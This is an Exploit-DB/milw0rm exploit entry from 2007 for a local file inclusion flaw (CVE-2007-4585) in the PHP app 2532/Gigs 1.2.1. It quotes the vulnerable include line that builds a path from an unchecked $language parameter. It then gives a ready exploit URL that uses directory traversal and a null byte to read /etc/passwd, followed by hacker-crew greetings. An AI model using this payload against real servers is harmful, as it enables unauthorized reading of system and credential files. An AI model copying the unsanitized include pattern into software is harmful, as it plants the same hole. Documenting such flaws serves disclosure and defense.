2532/Gigs 1.2.1 - 'activateuser.php' Local File Inclusion

Author: bd0rk
type: webapps
platform: php
port: 
date_added: 2007-08-25 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-36687;CVE-2007-4585 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.com2532Gigs_1.2.1_stable.zip

            -°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°

             2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

                              Discovered by bd0rk || SOH-Crew

                                    www.soh-crew.it.tt

                         The german Coding and IT-Security Ressource

             -°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°


Vendor: http://www.2532gigs.com

Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip

License: Free

Vulnerable Code: include_once("languages/$language/settings.php");



Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00



Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32


####The 18 years old, german Hacker bd0rk####

# milw0rm.com [2007-08-26]